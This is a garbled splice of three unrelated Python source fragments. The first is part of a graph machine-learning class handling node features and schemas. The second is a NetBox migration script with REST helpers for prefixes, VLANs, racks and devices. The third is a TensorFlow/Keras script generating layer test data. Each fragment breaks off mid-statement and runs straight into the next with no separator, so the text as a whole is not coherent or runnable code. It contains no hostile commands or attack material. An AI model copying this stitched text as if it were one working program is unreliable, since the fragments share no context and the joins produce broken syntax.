        # TODO: add @property decorator
        if not is_real_iterable(nodes):
            nodes = [nodes]

        # Get the node type if not specified.
        if node_type is None:
            node_types = {
                self._get_node_type(self._graph.nodes[n])
                for n in nodes
                if n is not None
            }
            if len(node_types) > 1:
                raise ValueError("All nodes must be of the same type.")

            if len(node_types) == 0:
                raise ValueError(
                    "At least one node must be given if node_type not specified"
                )

            node_type = node_types.pop()

        # Check node_types
        if (
            node_type not in self._node_attribute_arrays
            or node_type not in self._node_index_maps
        ):
            raise ValueError(f"Features not found for node type '{node_type}'")

        # Edge case: if we are given no nodes, what do we do?
        if len(nodes) == 0:
            # return an empty (0, feature_size) array for an empty request
            feature_size = self._node_attribute_arrays[node_type].shape[1]
            return np.empty((0, feature_size))

        # Get index for nodes of this type
        nt_id_to_index = self._node_index_maps[node_type]
        node_indices = [nt_id_to_index.get(n) for n in nodes]

        if None in node_indices:
            # report exactly which requested IDs had no stored features
            problem_nodes = [
                node for node, index in zip(nodes, node_indices) if index is None
            ]
            raise ValueError(
                "Could not find features for nodes with IDs {}.".format(problem_nodes)
            )

        features = self._node_attribute_arrays[node_type][node_indices]
        return features

    def node_feature_sizes(self, node_types=None):
        """
        Get the feature sizes for the specified node types.

        Args:
            node_types: (list) A list of node types. If None all current node
                types will be used.

        Returns:
            A dictionary of node type and integer feature size.
        """
        # TODO: unit test!
        if not node_types:
            node_types = self.node_types

        self.check_graph_for_ml(features=True)

        fsize = {nt: self._node_attribute_arrays[nt].shape[1] for nt in node_types}
        return fsize

    def nodes_of_type(self, node_type=None):
        """
        Get the nodes of the graph with the specified node types.

        Args:
            node_type:

        Returns:
            A list of node IDs with type node_type
        """
        # TODO: unit test!
        if node_type is None:
            return list(self)
        else:
            return [
                n
                for n, ndata in self._graph.nodes(data=True)
                if self._get_node_type(ndata) == node_type
            ]

    def node_type(self, node):
        """
        Get the type of the node

        Args:
            node: Node ID

        Returns:
            Node type
        """
        return self._get_node_type(self._graph.nodes[node])

    @property
    def node_types(self):
        """
        Get a list of all node types in the graph.

        Returns:
            set of types
        """
        # TODO: unit test!
        # TODO: create a schema when we generate _node_attribute_arrays and use it?
        if len(self._node_attribute_arrays) > 0:
            # the attribute arrays are authoritative once features are loaded
            return set(self._node_attribute_arrays.keys())
        else:
            return {
                self._get_node_type(ndata)
                for n, ndata in self._graph.nodes(data=True)
            }

    def info(self, show_attributes=True, sample=None):
        """
        Return an information string summarizing information on the current graph.
        This includes node and edge type information and their attributes.

        Note: This requires processing all nodes and edges and could take a long
        time for a large graph.

        Args:
            sample (int): To speed up the graph analysis, use only a random sample
                of this many nodes and edges.

        Returns:
            An information string.
        """
        directed_str = "Directed" if self.is_directed() else "Undirected"
        s = "{}: {} multigraph\n".format(type(self).__name__, directed_str)
        s += " Nodes: {}, Edges: {}\n".format(
            self.number_of_nodes(), self.number_of_edges()
        )

        # Sample the nodes for our analysis
        if sample:
            all_nodes = list(self._graph.nodes)
            snodes = random.sample(all_nodes, sample)
        else:
            snodes = None

        gs = self.create_graph_schema(create_type_maps=False, nodes=snodes)

        def is_of_edge_type(e, edge_type):
            # compare the (src type, edge type, dst type) triple of edge e
            et2 = (
                self._get_node_type(self._graph.nodes[e[0]]),
                self._get_edge_type(self._graph.edges[e]),
                self._get_node_type(self._graph.nodes[e[1]]),
            )
            return et2 == edge_type

        # Go over all node types
        s += "\n Node types:\n"
        for nt in gs.node_types:
            # Filter nodes by type
            nt_nodes = [
                ndata
                for n, ndata in self._graph.nodes(data=True)
                if self._get_node_type(ndata) == nt
            ]
            s += " {}: [{}]\n".format(nt, len(nt_nodes))

            # Get the attributes for this node type
            attrs = set(it.chain(*[ndata.keys() for ndata in nt_nodes]))
            attrs.discard(self._node_type_attr)
            if show_attributes and len(attrs) > 0:
                s += " Attributes: {}\n".format(attrs)

            s += " Edge types: "
            s += ", ".join(["{}-{}->{}".format(*e) for e in gs.schema[nt]]) + "\n"

        s += "\n Edge types:\n"
        for et in gs.edge_types:
            # Filter edges by type
            et_edges = [
                e[3]
                for e in self._graph.edges(keys=True, data=True)
                if is_of_edge_type(e[:3], et)
            ]
            if len(et_edges) > 0:
                s += " {et[0]}-{et[1]}->{et[2]}: [{len}]\n".format(
                    et=et, len=len(et_edges)
                )

                # Get the attributes for this edge type
                attrs = set(it.chain(*[edata.keys() for edata in et_edges]))
                attrs.discard(self._edge_type_attr)
                if show_attributes and len(attrs) > 0:
                    s += " Attributes: {}\n".format(attrs)

        return s

    def create_graph_schema(self, create_type_maps=True, nodes=None):
        """
        Create graph schema in dict of dict format from current graph.

        Note the assumption we make that there is only one edge of a particular
        edge type per node pair. This means that specifying an edge by node0,
        node1 and edge type is unique.

        Arguments:
            create_type_maps (bool): If True quick lookup of node/edge types is
                created in the schema. This can be slow.

            nodes (list): A list of node IDs to use to build schema. This must
                represent all node types and all edge types in the graph.
                If specified, `create_type_maps` must be False.
                If not specified, all nodes and edges in the graph are used.

        Returns:
            GraphSchema object.
        """
        if nodes is None:
            nodes = self.nodes()
            edges = self.edges(triple=True)
        elif create_type_maps is False:
            edges = (
                (src, dst, self._get_edge_type(data))
                for src, dst, data in self._graph.edges(nodes, data=True)
            )
        else:
            raise ValueError("Creating type maps for subsampled nodes is not supported")

        # Create node type index list
        node_types = sorted({self.node_type(n) for n in nodes}, key=str)

        graph_schema = {nt: set() for nt in node_types}

        # Create edge type index list
        edge_types = set()
        for n1, n2, edge_type in edges:
            # Edge type tuple
            node_type_1 = self.node_type(n1)
            node_type_2 = self.node_type(n2)

            # Add edge
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = 1.00
import os
import json
import logging
from os import replace
import pprint
import pymysql
import pynetbox
import requests
import slugify
import socket
import struct
import urllib3
import urllib.parse
import re
from time import sleep
import yaml
import copy
import datetime
import re
import ipcalc


class Migrator:
    """Helpers for creating tenancy/site objects in NetBox (mostly stubs)."""

    def slugify(self, text):
        # NetBox slugs have a length limit; cap at 50 characters
        return slugify.slugify(text, max_length=50)

    def create_tenant_group(self, name):
        pass

    def create_tenant(self, name, tenant_group=None):
        # BUG FIX: .format() must apply to the message string, not to the None
        # returned by logger.info() -- the old code raised AttributeError.
        logger.info("Creating tenant {}".format(name))
        tenant = {"name": name, "slug": self.slugify(name)}
        if tenant_group:
            tenant["tenant_group"] = netbox.tenancy.tenant_groups.all()
        return netbox.tenancy.tenants.create(tenant)

    def create_region(self, name, parent=None):
        # NOTE(review): stub -- creates an empty region and ignores `parent`
        netbox.dcim.regions.create()
        if not parent:
            pass
        pass

    def create_site(
        self,
        name,
        region,
        status,
        physical_address,
        facility,
        shipping_address,
        contact_phone,
        contact_email,
        contact_name,
        tenant,
        time_zone,
    ):
        # NOTE(review): stub -- only computes the slug, never posts anything
        slug = self.slugify(name)
        pass


# Re-Enabled SSL verification
# urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class NETBOX(object):
    """Thin REST wrapper around the NetBox API (plus a pynetbox handle)."""

    def __init__(self, pynetboxobj):
        self.base_url = "{}/api".format(config["NetBox"]["NETBOX_HOST"])
        self.py_netbox = pynetboxobj
        self.all_ips = None
        self.all_prefixes = None
        # Create HTTP connection pool
        self.s = requests.Session()
        # SSL verification
        self.s.verify = True
        # Define REST Headers
        headers = {
            "Content-Type": "application/json",
            "Accept": "application/json; indent=4",
            "Authorization": "Token {0}".format(config["NetBox"]["NETBOX_TOKEN"]),
        }
        self.s.headers.update(headers)
        self.device_types = None

    def uploader(self, data, url, method="POST"):
        """Send `data` as JSON to `url`; return the decoded response or {}."""
        logger.debug("HTTP Request: {} - {} - {}".format(method, url, data))
        # defensive default so the final return never hits an unbound name
        return_obj = {}
        try:
            request = requests.Request(method, url, data=json.dumps(data))
            prepared_request = self.s.prepare_request(request)
            r = self.s.send(prepared_request)
            logger.debug(f"HTTP Response: {r.status_code!s} - {r.reason}")
            if r.status_code not in [200, 201]:
                logger.debug(r.text)
            r.raise_for_status()
            r.close()
        except:
            logger.debug("POST attempt failed")
        try:
            if r:
                # BUG FIX: Response.json is a method -- the old `r.json`
                # returned the bound method object, not the decoded payload.
                return_obj = r.json()
        except:
            sleep(2)
            return {}
        return return_obj

    def uploader2(self, data, url, method="POST"):
        # ignores failures.
        method = "POST"
        logger.debug("HTTP Request: {} - {} - {}".format(method, url, data))
        request = requests.Request(method, url, data=json.dumps(data))
        prepared_request = self.s.prepare_request(request)
        r = self.s.send(prepared_request)
        logger.debug(f"HTTP Response: {r.status_code!s} - {r.reason}")
        r.close()
        logger.debug(r.text)

    def fetcher(self, url):
        """GET `url` with up to 3 attempts; return body text or exit(1)."""
        method = "GET"
        logger.debug("HTTP Request: {} - {}".format(method, url))
        max_attempts = 3
        current_attempt = 0
        while current_attempt < max_attempts:
            try:
                request = requests.Request(method, url)
                prepared_request = self.s.prepare_request(request)
                r = self.s.send(prepared_request)
                logger.debug(f"HTTP Response: {r.status_code} - {r.reason}")
                r.raise_for_status()
                r.close()
            except:
                sleep(2)
                logger.debug("fetch attempt failed")
            try:
                if r:
                    if r.status_code == 200:
                        return r.text
            except:
                test = ""
            current_attempt = current_attempt + 1
        logger.debug("failed to get {} 3 times".format(url))
        exit(1)

    def post_subnet(self, data):
        """Create or update (PUT) an IPAM prefix."""
        url = self.base_url + "/ipam/prefixes/"
        exists = self.check_for_subnet(data)
        if exists[0]:
            logger.info("prefix/subnet: {} already exists, updating with Put".format(data["prefix"]))
            method = "PUT"
            url = "{}{}/".format(url, exists[1]["id"])
            self.uploader(data, url, method)
        else:
            logger.info("Posting data to {}".format(url))
            self.uploader(data, url)

    def check_for_subnet(self, data):
        """Return (True, prefix_dict) if the prefix exists, else (False, False)."""
        url_safe_ip = urllib.parse.quote_plus(data["prefix"])
        url = self.base_url + "/ipam/prefixes/?prefix={}".format(url_safe_ip)
        logger.info("checking for existing prefix in netbox: {}".format(url))
        check = self.fetcher(url)
        json_obj = json.loads(check)
        # logger.debug("response: {}".format(check))
        if json_obj["count"] == 1:
            return True, json_obj["results"][0]
elif json_obj["count"] > 1: logger.error("duplicate prefixes exist. cleanup!") exit(2) else: return False, False def check_for_ip(self, data): url_safe_ip = urllib.parse.quote_plus(data["address"]) url = self.base_url + "/ipam/ip-addresses/?address={}".format(url_safe_ip) logger.info("checking for existing ip in netbox: {}".format(url)) check = self.fetcher(url) json_obj = json.loads(check) # logger.debug("response: {}".format(check)) if json_obj["count"] == 1: return True elif json_obj["count"] > 1: logger.error("duplicate ip's exist. cleanup!") exit(2) else: return False def device_type_checker(self, device_model_name, attempt_import=True): if not self.device_types: self.device_types = {str(item.slug): dict(item) for item in self.py_netbox.dcim.device_types.all()} if not attempt_import: self.device_types = {str(item.slug): dict(item) for item in self.py_netbox.dcim.device_types.all()} slug_id = None if str(device_model_name) in device_type_map_preseed["by_key_name"].keys(): logger.debug("hardware match") # print(str(devicedata['hardware'])) nb_slug = device_type_map_preseed["by_key_name"][str(device_model_name)]["slug"] if nb_slug in self.device_types: logger.debug("found template in netbox") slug_id = self.device_types[nb_slug]["id"] elif attempt_import: logger.debug("did not find matching device template in netbox, attempting import") self.post_device_type(device_model_name, device_type_map_preseed["by_key_name"][str(device_model_name)]) return self.device_type_checker(device_model_name, False) else: logger.debug("did not find matching device template in netbox") if not config["Misc"]["SKIP_DEVICES_WITHOUT_TEMPLATE"] == True: logger.debug("device with no matching template by slugname {nb_slug} found") exit(112) else: logger.debug("hardware type missing: {}".format(device_model_name)) return slug_id def post_ip(self, data): url = self.base_url + "/ipam/ip-addresses/" exists = self.check_for_ip(data) if exists: logger.info("ip: {} already exists, 
skipping".format(data["address"])) else: logger.info("Posting IP data to {}".format(url)) self.uploader(data, url) def get_sites(self): url = self.base_url + "/dcim/sites/" resp = self.fetcher(url) return json.loads(resp)["results"] def get_sites_keyd_by_description(self): sites = self.get_sites() resp = {} for site in sites: if site["description"] == "": logger.debug("site: {} {} has no description set, skipping".format(site["display"], site["url"])) else: if not site["description"] in resp.keys(): resp[site["description"]] = site else: logger.debug("duplicate description detected! {}".format(site["description"])) return resp def post_rack(self, data): url = self.base_url + "/dcim/racks/" exists = self.check_if_rack_exists(data) if exists[0]: logger.info("rack: {} already exists, updating".format(data["name"])) url = url + "{}/".format(exists[1]) self.uploader(data, url, "PUT") else: logger.info("Posting rack data to {}".format(url)) self.uploader(data, url) def check_if_rack_exists(self, data): url_safe_ip = urllib.parse.quote_plus(data["name"]) url = self.base_url + "/dcim/racks/?name={}".format(url_safe_ip) logger.info("checking for existing rack in netbox: {}".format(url)) check = self.fetcher(url) json_obj = json.loads(check) if json_obj["count"] == 0: return False, False else: for rack in json_obj["results"]: if rack["site"]["id"] == data["site"]: return True, rack["id"] return False # elif json_obj["count"] > 1: # logger.error("duplicate ip's exist. 
cleanup!") # exit(2) # else: # return False def post_tag(self, tag, description): url = self.base_url + "/extras/tags/" data = {} data["name"] = str(tag) data["slug"] = str(tag).lower().replace(" ", "_") if not description is None: data["description"] = description self.uploader2(data, url) def get_tags_key_by_name(self): url = self.base_url + "/extras/tags/?limit=10000" resp = json.loads(self.fetcher(url)) tags = {} for tag in resp["results"]: tags[tag["name"]] = tag logger.debug(tags) return tags def check_for_vlan_group(self, group_name): url = self.base_url + "/ipam/vlan-groups/?name={}".format(group_name) logger.info("checking for vlan-group in netbox: {}".format(url)) check = self.fetcher(url) json_obj = json.loads(check) # logger.debug("response: {}".format(check)) if json_obj["count"] == 1: logger.debug("found matching group") return True, json_obj["results"][0] elif json_obj["count"] > 1: logger.debug("duplcate groups detected, fix this") logger.debug(json_obj) exit(1) else: return False, False def get_vlan_groups_by_name(self): url = self.base_url + "/ipam/vlan-groups/?limit=10000" resp = json.loads(self.fetcher(url)) groups = {} for group in resp["results"]: if group["name"] in groups.keys(): logger.debug("duplicate group name exists! fix this. 
group: {}".format(group["name"])) exit(1) groups[group["name"]] = group logger.debug(groups) return groups def post_vlan_group(self, group_name, rt_id): url = self.base_url + "/ipam/vlan-groups/" data = {} data["name"] = str(group_name) data["description"] = str(group_name) slug_prep = str(group_name).lower().replace(" ", "-").replace(":", "") data["slug"] = slugify.slugify(slug_prep, separator="_") data["custom_fields"] = {"rt_id": rt_id} pp.pprint(data) if not self.check_for_vlan_group(group_name)[0]: self.uploader2(data, url) def check_for_vlan(self, data): url = self.base_url + "/ipam/vlans/?vid={}&group_id={}".format(data["vid"], data["group"]) logger.info("checking for vlan in netbox: {}".format(url)) check = self.fetcher(url) json_obj = json.loads(check) # logger.debug("response: {}".format(check)) if json_obj["count"] == 1: logger.debug("matching vlan found") return True, json_obj["results"][0] elif json_obj["count"] > 1: logger.debug("duplcate vlans detected, fix this") logger.debug(json_obj) exit(1) else: return False, False def get_nb_vlans(self): vlans_by_netbox_id = {} url = self.base_url + "/ipam/vlans/?limit=10000" resp = json.loads(self.fetcher(url)) for vlan in resp["results"]: vlans_by_netbox_id[vlan["id"]] = vlan return vlans_by_netbox_id def post_vlan(self, data): url = self.base_url + "/ipam/vlans/" exists = self.check_for_vlan(data) if exists[0]: logger.info("vlan: {} already exists, updating".format(data["name"])) url = url + "{}/".format(exists[1]["id"]) self.uploader(data, url, "PUT") else: logger.info("Posting vlan data to {}".format(url)) self.uploader(data, url) def post_device_type(self, device_type_key, device_type): logger.debug("post_device_type:") logger.debug(device_type_key) logger.debug(device_type) data = {} if "device_template_data" in device_type.keys(): import_source = device_type["device_template_data"] else: import_source = device_type if "yaml_file" in import_source.keys(): filename = import_source["yaml_file"] with 
open(filename, "r") as stream: try: data = yaml.safe_load(stream) except yaml.YAMLError as exc: logger.debug(f"failed to load {import_source['yaml_file']} for {device_type_key} template") logger.debug(exc) if "yaml_url" in import_source.keys(): try: resp = requests.get(import_source["yaml_url"]) data = yaml.safe_load(resp.text) except: logger.debug(f"failed to load {import_source['yaml_url']} for {device_type_key} template") pp.pprint(data) man_data = {"name": data["manufacturer"], "slug": self.slugFormat(data["manufacturer"])} self.createManufacturers([man_data], py_netbox) data["manufacturer"] = man_data self.createDeviceTypes([data], py_netbox) self.device_types = {str(item.slug): dict(item) for item in self.py_netbox.dcim.device_types.all()} def post_device(self, data, py_netbox=None, has_problems=False): if not py_netbox: py_netbox = self.py_netbox needs_updating = False device_check1 = [item for item in py_netbox.dcim.devices.filter(cf_rt_id=data["custom_fields"]["rt_id"])] if len(device_check1) == 1: if device_check1[0]["custom_fields"]["rt_id"] == data["custom_fields"]["rt_id"]: logger.debug("device already in netbox (via rt_id). sending to update checker") needs_updating = True matched_by = "cf_rt_id" if not needs_updating: if "asset_tag" in data.keys(): device_check2 = [str(item) for item in py_netbox.dcim.devices.filter(asset_tag=data["asset_tag"])] if len(device_check2) == 1: logger.debug("device already in netbox (via asset_tag). sending to update checker") needs_updating = True matched_by = "asset_tag" if not needs_updating: device_check3 = [str(item) for item in py_netbox.dcim.devices.filter(name=data["name"])] if len(device_check3) == 1: logger.debug("device already in netbox (via name). 
sending to update checker") needs_updating = True matched_by = "name" if needs_updating: self.update_device(data, matched_by, py_netbox, has_problems) else: try: if has_problems: data["status"] = "failed" py_netbox.dcim.devices.create(data) except pynetbox.RequestError as e: logger.debug("matched request error") pp.pprint(e.args) if "device with this Asset tag already exists" in str(e): logger.debug("matched by asset tag") matched_by = "asset_tag" needs_updating = True elif "device with this name already exists" in str(e): logger.debug("matched by name") matched_by = "name" needs_updating = True if needs_updating: # update existing device self.update_device(data, matched_by, py_netbox, has_problems) def update_device(self, data, match_type, py_netbox, has_problems=False): if match_type == "cf_rt_id": device = py_netbox.dcim.devices.get(cf_rt_id=data["custom_fields"]["rt_id"]) elif match_type == "asset_tag": device
test more simple. detections = sorted(detections[0, 0, :, :], cmp=lambda x, y: -1 if x[1] < y[1] and x[2] < y[2] else 0) np.save('ssd_mobilenet_v1_coco.detection_out.npy', detections) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') conv = tf.layers.conv2d(inp, filters=5, kernel_size=[1, 1], activation=tf.nn.relu, bias_initializer=tf.random_normal_initializer()) flattened = tf.reshape(conv, [1, -1], 'reshaped') biases = tf.Variable(tf.random_normal([10]), name='matmul_biases') weights = tf.Variable(tf.random_normal([2*3*5, 10]), name='matmul_weights') mm = tf.matmul(flattened, weights) + biases save(inp, mm, 'nhwc_reshape_matmul') ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') conv = tf.layers.conv2d(inp, filters=5, kernel_size=[1, 1], activation=tf.nn.relu, bias_initializer=tf.random_normal_initializer()) transposed = tf.transpose(conv, [0, 1, 2, 3]) flattened = tf.reshape(transposed, [1, -1], 'reshaped') biases = tf.Variable(tf.random_normal([10]), name='matmul_biases') weights = tf.Variable(tf.random_normal([2*3*5, 10]), name='matmul_weights') mm = tf.matmul(flattened, weights) + biases save(inp, flattened, 'nhwc_transpose_reshape_matmul') ################################################################################ inp = tf.placeholder(tf.float32, [1, 6, 5, 3], 'input') conv = tf.layers.conv2d(inputs=inp, filters=3, kernel_size=[1, 1], activation=tf.nn.relu, bias_initializer=tf.random_normal_initializer()) save(inp, conv, 'uint8_single_conv', quantize=True) runModel(inp, conv.name, 'uint8_single_conv') ################################################################################ inp = tf.placeholder(tf.float32, [1, 4, 4, 1], 'input') conv = tf.layers.conv2d(inp, filters=3, kernel_size=[3, 3], padding='SAME') pool = tf.layers.average_pooling2d(conv, pool_size=3, strides=1, 
padding='SAME') save(inp, pool, 'ave_pool_same') ################################################################################ inp = tf.placeholder(tf.float32, [1, 4, 6, 1], 'input') conv = tf.layers.conv2d(inp, filters=3, kernel_size=[1, 1], padding='SAME') sliced = tf.slice(conv, [0, 1, 2, 0], [-1, 3, 4, 1]) save(inp, sliced, 'slice_4d') ################################################################################ inp = tf.placeholder(tf.float32, [1, 4, 4, 1], 'input') # ky kx out in deconv_weights = tf.Variable(tf.random_normal([3, 3, 2, 1], dtype=tf.float32)) deconv = tf.nn.conv2d_transpose(inp, deconv_weights, output_shape=[1, 4, 4, 2], strides=[1, 1, 1, 1], padding='SAME') leakyRelu = tf.nn.leaky_relu(deconv, alpha=0.2) save(inp, leakyRelu, 'deconvolution_same') # ################################################################################ inp = tf.placeholder(tf.float32, [1, 3, 3, 1], 'input') deconv_weights = tf.Variable(tf.random_normal([3, 3, 2, 1], dtype=tf.float32)) deconv = tf.nn.conv2d_transpose(inp, deconv_weights, output_shape=[1, 5, 5, 2], strides=[1, 2, 2, 1], padding='SAME') save(inp, deconv, 'deconvolution_stride_2_same') ################################################################################ inp = tf.placeholder(tf.float32, [1, 3, 2, 1], 'input') deconv_weights = tf.Variable(tf.random_normal([3, 3, 2, 1], dtype=tf.float32)) deconv = tf.nn.conv2d_transpose(inp, deconv_weights, output_shape=[1, 8, 6, 2], strides=[1, 2, 2, 1], padding='VALID') save(inp, deconv, 'deconvolution_adj_pad_valid') ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 2, 1], 'input') deconv_weights = tf.Variable(np.ones([3, 3, 1, 1]), dtype=tf.float32) deconv = tf.nn.conv2d_transpose(inp, deconv_weights, output_shape=[1, 4, 4, 1], strides=[1, 2, 2, 1], padding='SAME') save(inp, deconv, 'deconvolution_adj_pad_same') 
################################################################################ inp = tf.placeholder(tf.float32, [1, 3, 4, 5], 'input') gamma = tf.Variable(tf.random_normal([5], dtype=tf.float32)) beta = tf.Variable(tf.random_normal([5], dtype=tf.float32)) bn = tf.nn.fused_batch_norm(inp, gamma, beta, epsilon=1e-5, is_training=True)[0] save(inp, bn, 'mvn_batch_norm') ################################################################################ inp = tf.placeholder(tf.float32, [1, 1, 1, 5], 'input') gamma = tf.Variable(tf.random_normal([5], dtype=tf.float32)) beta = tf.Variable(tf.random_normal([5], dtype=tf.float32)) bn = tf.nn.fused_batch_norm(inp, gamma, beta, epsilon=1e-5, is_training=True)[0] save(inp, bn, 'mvn_batch_norm_1x1') ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') bn = tf.layers.batch_normalization(inp, training=False, fused=False, name='unfused_batch_norm', beta_initializer=tf.random_normal_initializer(), gamma_initializer=tf.random_normal_initializer(), moving_mean_initializer=tf.random_uniform_initializer(-2, 1), moving_variance_initializer=tf.random_uniform_initializer(0.1, 2),) save(inp, bn, 'unfused_batch_norm', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') bn = tf.layers.batch_normalization(inp, training=False, fused=True, name='fused_batch_norm_no_gamma', beta_initializer=tf.random_normal_initializer(), scale=False, moving_mean_initializer=tf.random_uniform_initializer(-2, 1), moving_variance_initializer=tf.random_uniform_initializer(0.1, 2),) save(inp, bn, 'fused_batch_norm_no_gamma', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') bn = tf.layers.batch_normalization(inp, training=False, fused=False, name='unfused_batch_norm_no_gamma', 
beta_initializer=tf.random_normal_initializer(), scale=False, moving_mean_initializer=tf.random_uniform_initializer(-2, 1), moving_variance_initializer=tf.random_uniform_initializer(0.1, 2),) save(inp, bn, 'unfused_batch_norm_no_gamma', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3], 'input') flatten = tf.contrib.layers.flatten(inp) save(inp, flatten, 'unfused_flatten', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [None, 2, 3], 'input') flatten = tf.contrib.layers.flatten(inp) save(inp, flatten, 'unfused_flatten_unknown_batch', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') relu = tf.maximum(inp, 0.01 * inp, name='leaky_relu') * 2 save(inp, relu, 'leaky_relu_order1', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') relu = tf.maximum(inp, inp * 0.01, name='leaky_relu') * 2 save(inp, relu, 'leaky_relu_order2', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') relu = tf.maximum(0.01 * inp, inp, name='leaky_relu') * 2 save(inp, relu, 'leaky_relu_order3', optimize=False) ################################################################################ from tensorflow import keras as K model = K.models.Sequential() model.add(K.layers.Softmax(name='keras_softmax', input_shape=(2, 3, 4))) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_softmax_input:0'), sess.graph.get_tensor_by_name('keras_softmax/truediv:0'), 'keras_softmax', optimize=False) ################################################################################ model = 
K.models.Sequential() model.add(K.layers.Conv2D(filters=4, kernel_size=1, data_format='channels_last', name='keras_mobilenet_head_conv', input_shape=(2, 3, 4))) model.add(K.layers.GlobalAveragePooling2D(name='keras_mobilenet_head_pool')) model.add(K.layers.Reshape((1, 1, 4), name='keras_mobilenet_head_reshape')) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_mobilenet_head_conv_input:0'), sess.graph.get_tensor_by_name('keras_mobilenet_head_reshape/Reshape:0'), 'keras_mobilenet_head', optimize=False) ################################################################################ def keras_relu6(x): return K.activations.relu(x, max_value=6) inp = K.Input(shape=(2, 3, 4), name='keras_relu6_input') relu = K.layers.Activation(keras_relu6, name='keras_relu6')(inp) model = K.Model(inp, relu) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_relu6_input:0'), sess.graph.get_tensor_by_name('keras_relu6/clip_by_value:0'), 'keras_relu6', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [2, 3], 'input') max_node = tf.clip_by_value(inp, clip_value_min=0, clip_value_max=1) save(inp, max_node, 'clip_by_value') ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') reduced = tf.reduce_mean(inp, axis=[1, 2], keepdims=True) save(inp, reduced, 'reduce_mean') ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') reduced = tf.reduce_sum(inp, axis=[1, 2], keepdims=True) save(inp, reduced, 'reduce_sum') ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') reduced = tf.reduce_sum(inp, axis=[2], keepdims=False) save(inp, reduced, 'sum_pool_by_axis') 
################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') pool = tf.layers.average_pooling2d(inp, pool_size=1, strides=1, padding='SAME') l2norm = tf.nn.l2_normalize(pool, axis=-1) l2norm = tf.nn.l2_normalize(l2norm, axis=[2, 3, 1]) save(inp, l2norm, 'l2_normalize') ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4], 'input') l2norm = tf.nn.l2_normalize(inp, axis=1) l2norm = tf.nn.l2_normalize(l2norm, axis=-1) l2norm = tf.nn.l2_normalize(l2norm, axis=[0, 1]) save(inp, l2norm, 'l2_normalize_3d') ################################################################################ model = K.models.Sequential() model.add(K.layers.Conv2DTranspose(filters=4, kernel_size=3, strides=(2, 2), data_format='channels_last', name='keras_deconv_valid', input_shape=(4, 5, 2))) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_deconv_valid_input:0'), sess.graph.get_tensor_by_name('keras_deconv_valid/BiasAdd:0'), 'keras_deconv_valid', optimize=True) ################################################################################ model = K.models.Sequential() model.add(K.layers.Conv2DTranspose(filters=4, kernel_size=3, strides=(2, 2), data_format='channels_last', name='keras_deconv_same', input_shape=(4, 5, 2), padding='same')) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_deconv_same_input:0'), sess.graph.get_tensor_by_name('keras_deconv_same/BiasAdd:0'), 'keras_deconv_same', optimize=True) ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') resized = tf.image.resize_bilinear(inp, size=[9, 8], name='resize_bilinear') save(inp, resized, 'resize_bilinear') ################################################################################ inp = tf.placeholder(tf.float32, 
[None, 3, 4, 5], 'input') resized = tf.image.resize_bilinear(inp, size=[tf.shape(inp)[1]*2, tf.shape(inp)[2]*3], name='resize_bilinear_factor') sub_add = resized - 0.3 + 0.3 save(inp, sub_add, 'resize_bilinear_factor', optimize=False) ################################################################################ model = K.models.Sequential() model.add(K.layers.SeparableConv2D(filters=4, kernel_size=3, strides=(1, 1), dilation_rate=(2, 3), name='keras_atrous_conv2d_same', input_shape=(11, 12, 2), padding='same')) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_atrous_conv2d_same_input:0'), sess.graph.get_tensor_by_name('keras_atrous_conv2d_same/BiasAdd:0'), 'keras_atrous_conv2d_same', optimize=True) ################################################################################ # Generate test data for Faster-RCNN object detection model from TensorFlow # model zoo, http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_v2_coco_2018_01_28.tar.gz for name in ['faster_rcnn_inception_v2_coco_2018_01_28', 'faster_rcnn_resnet50_coco_2018_01_28']: with tf.gfile.FastGFile(os.path.join('..', name + '.pb')) as f: # Load the model graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) with tf.Session(graph=tf.Graph()) as localSession: # Restore session localSession.graph.as_default() tf.import_graph_def(graph_def, name='') # Receive output inp = cv.imread('../dog416.png') inp = cv.resize(inp, (800, 600)) inp = inp[:, :, [2, 1, 0]] # BGR2RGB out = localSession.run([localSession.graph.get_tensor_by_name('num_detections:0'), # localSession.graph.get_tensor_by_name('detection_scores:0'), # localSession.graph.get_tensor_by_name('detection_boxes:0'), # localSession.graph.get_tensor_by_name('detection_classes:0')], # feed_dict={'image_tensor:0': inp.reshape(1, inp.shape[0], inp.shape[1], 3)}) # Pack detections in format [id, class_id, confidence, left, top, right, bottom] num_detections = int(out[0][0]) 
